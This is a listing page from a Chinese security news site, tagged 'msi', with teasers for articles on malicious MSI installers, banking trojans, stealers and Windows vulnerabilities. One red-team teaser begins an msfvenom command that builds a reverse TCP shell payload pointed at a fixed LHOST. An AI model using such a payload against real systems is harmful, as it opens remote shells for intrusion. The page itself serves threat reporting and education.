msi - 第 4 | CN-SEC 中文网

安全新闻

成熟后门再度投递，银狐变种利用MSI实行远控

近期，火绒威胁情报中心监测到一款伪装成MSI安装包的恶意木马正在传播，火绒安全工程师第一时间提取样本进行分析。分析中发现样本在双击执行后会启动数个cmd进程执行释放的木马，该木马不断从远端服务器上下载...

07月29日40 views评论

阅读全文

安全文章

Windows Installer 的 Custom Actions 攻击面分析

Windows Installer，利用自定义操作一年多以前，我发表了我的关于Windows Installer服务的研究。文章详细解释了MSI修复过程如何在提升的上下文中执行，但由于缺乏模拟可能导致...

07月29日51 views评论

阅读全文

安全新闻

Windows 系统中的严重漏洞：攻击者如何完全控制您的 PC

Windows系统上广泛使用的软件MSI Center被发现存在严重安全漏洞。该漏洞分类为CVE-2024-37726，CVSS 评分为 7.8（高）。允许低权限的攻击者完全控制系统。权限提升是指在没...

07月15日18 views评论

阅读全文

安全新闻

横扫全球:Grandoreiro银行木马活动

更多全球网络安全资讯尽在邑安全前言近期关注的一些攻击活动中，刷到了有关Grandoreiro银行木马恶意软件活动，此类恶意软件活动主要针对巴西、墨西哥、西班牙和秘鲁国家等，自 2017 年以来，一直是...

07月08日21 views评论

阅读全文

安全文章

新版本 Redline 使用 Lua 字节码逃避检测

近日，研究人员观察到 Redline Stealer 木马的新变种，开始利用 Lua 字节码逃避检测。遥测分布根据遥测数据，Redline Stealer 木马已经日渐流行，覆盖北美洲、南...

07月04日23 views评论

阅读全文

安全新闻

黑客利用恶意 VPN 安装程序攻击我国用户

近期攻击我国用户的行动有点多啊！中文用户成为了一个新的威胁活动团伙Void Arachne的目标。该团伙利用针对VPN的恶意Windows Installer（MSI）文件，来传播一种名为Winos ...

06月20日55 views评论

阅读全文

安全新闻

新的 SSLoad 恶意软件与劫持整个网络域的工具相结合

FROZEN#SHADOW 被发现采用了一种新的攻击活动，该活动利用 SSLoad 恶意软件进行操作，并利用 Cobalt Strike Implants 来控制和接管整个网络。此外，威胁分子还使用S...

05月29日108 views评论

阅读全文

安全新闻

黑客利用 Windows SmartScreen 漏洞投放 DarkGate 恶意软件

关键词恶意软件DarkGate 恶意软件操作发起的新一波攻击，利用现已修复的 Windows Defender SmartScreen 漏洞来绕过安全检查，并自动安装虚假软件安装程序。SmartScr...

04月22日23 views评论

阅读全文

安全文章

红队战术 - WMI + MSI 横向移动

执行在 MSI（Microsoft 安装程序包）中生成恶意负载：攻击者@localmsfvenom -p windows/x64/shell_reverse_tcp LHOST=10.0.0.5 LP...

04月19日13 views评论

阅读全文

安全漏洞

[漏洞复现] Rust命令注入漏洞 CVE-2024-24576

本人非原创漏洞作者，文章仅作为知识分享用一切直接或间接由于本文所造成的后果与本人无关如有侵权，联系删除产品简介Rust 是 Mozilla 的一个新的编程语言，由 web 语言的领军人物 Brenda...

04月12日103 views评论

阅读全文

安全新闻

最流行的恶意软件行为和技术

对100,000 多个 Windows 恶意软件样本的分析揭示了恶意软件开发人员用来成功逃避防御、提升权限、执行恶意软件并确保其持久性的最流行技术。恶意软件策略和技术分析的恶意软件样本通常通过恶意电子...

03月22日21 views评论

阅读全文

安全新闻

黑客利用Windows SmartScreen漏洞投放DarkGate恶意软件

DarkGate 恶意软件发起的新一波攻击利用现已修复的 Windows Defender SmartScreen 漏洞来绕过安全检查并自动安装虚假软件安装程序。SmartScreen 是一项 Win...

03月22日20 views评论

阅读全文

成熟后门再度投递，银狐变种利用MSI实行远控

Windows Installer 的 Custom Actions 攻击面分析

Windows 系统中的严重漏洞：攻击者如何完全控制您的 PC

横扫全球:Grandoreiro银行木马活动

新版本 Redline 使用 Lua 字节码逃避检测

黑客利用恶意 VPN 安装程序攻击我国用户

新的 SSLoad 恶意软件与劫持整个网络域的工具相结合

黑客利用 Windows SmartScreen 漏洞投放 DarkGate 恶意软件

红队战术 - WMI + MSI 横向移动

[漏洞复现] Rust命令注入漏洞 CVE-2024-24576

最流行的恶意软件行为和技术

黑客利用Windows SmartScreen漏洞投放DarkGate恶意软件

在线咨询

微信